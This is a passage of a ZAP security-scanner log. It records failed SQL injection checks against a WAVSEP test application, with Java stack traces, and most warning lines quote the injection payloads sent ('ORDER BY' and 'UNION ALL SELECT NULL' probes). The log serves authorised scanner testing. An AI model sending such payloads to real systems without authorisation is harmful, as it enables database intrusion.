org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680935 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680935 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680937 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680938 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680938 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 9739#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 9739# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680939 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680940 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680940 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680941 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680941 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680942 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680943 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at 